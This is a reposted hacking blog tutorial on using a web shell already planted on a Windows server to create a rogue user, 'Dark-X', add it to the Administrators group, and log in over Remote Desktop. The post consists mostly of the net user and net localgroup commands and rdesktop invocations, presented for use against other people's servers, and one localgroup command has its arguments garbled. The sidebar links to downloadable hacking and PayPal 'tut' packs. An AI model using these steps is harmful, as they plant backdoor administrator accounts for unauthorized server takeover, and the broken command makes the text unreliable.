J2TEAM Security: A must-have extension for Chrome users. Install now!

Rooting Windows OR How to gain RDP Access

Rooting Windows OR How to gain RDP Access | Juno_okyo's Blog
1 min read
Rooting Windows OR How to gain RDP Access | Juno_okyo's Blog
Windows Rooting System or how to gain RDP Access.


Well this is diffirent from *Unix process there we use exploit here we use only commands
and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....



What we need:
-Shell atteched on Some Site
-Server must be runing on Windows OS

We access our shell and go to the command console and we frist gonna check who we are:


whoami

This command is to check with what user we are running and its can show us like:


Administrator or SystAdmin

Thats good we are running like administrator cool letz see how many users have on the server:
Code:

net user

And we gonna see something like :


C:\Users\Administrator>net user

\\SERVER **********

----------------------------------------------------------
Administrator Guest Remote
__________________________________
Command Successfully executed.

So this means that there are like 3 users on the this server :
Administrator,Guest,Remote
So we can try to add a new user ex: Dark-X
Code:

net user Dark-X /add

This command is for adding user with password:
Code:

net user Username Password /add

when we execute this command we will get some windows saying:
Code:

___________________________
Command Successfully executed.

now letz check:


net user Dark-X

Will display something like this:


Username: Dark-X
Name: Dark-X

Last Time Online: XX:XX:XX-XX/XX
Local Group: *User

So we are in group user we need to be in Administrator or Remote to connect on Remote Desktop Connection so we type:
Code:

Net localgroup Dark-X Administrator /add

and we will see agaen this line:

Command Successfully executed.

If we see this that means that we have added our user to Administrators group now we can try to connect on RDP and access the whole server.
Windows RDP Starting:

Start Menu=>All Programs=>Accessories=>Remote Desktop Connection

Linux:


Open Terminal write: rdesktop -u Username -p Password IP

or


rdesktop IP

Follow: http://hackthedevil.blogspot.com/2013/05/rooting-windows-or-how-to-gain-rdp.html
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • I/ Giới thiệu: Bộ giáo trình tài liệu về an ninh mạng được dịch lại hoàn toàn bằng tiếng việt từ bộ tiếng anh gốc + video demo cho mỗi chương. Bộ giáo trình này chỉ nêu những kiến…
  • 1. MPlayer, Google Chrome, VLC, MythTV... có chung điểm gì? Chúng đều xài thư viện FFmpeg. Rất nhiều phần mềm khác sử dụng thư viện này và có thể cái tivi hay chiếc điện thoại củ…
  • I/ Giới thiệu: Tiếp theo bộ tài liệu được share đợt 1. Hôm nay mình sẽ share cho các bạn bộ tài liệu đợt 2 này. II/ Nội dung: Nội dung của tài liệu bao gồm: các đề thi mẫu về môn L…
  • Kho TUT gồm: Tut Paypal, Tut Hacking-Exploit-Local, Tut Shopping và kiến thức cơ bản cho newbie…. Gồm 4 part gần 500MB: Part 1: http://www.mediafire.com/?giora5gsmr1bn2r Part 2:…
  • I/ Tài liệu đợt 3 : Link download tại đây: http://www.fshare.vn/folder/TXDCX6SB7T/ Pass download :longbaoitc II/ Nội dung: Gồm 2 phần - 1 là Data3 : chứa các kiến thức về ngôn ngữ…
  • Tài liệu share gồm 1/ Bộ DVD CCNA được tập hợp của 3 trung tâm VNPRO, Nhất Nghệ và Sao Bắc Đẩu. Link download: http://www.fshare.vn/file/TN41231MST 2/ Bộ tài liệu về LINUX Lin…

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!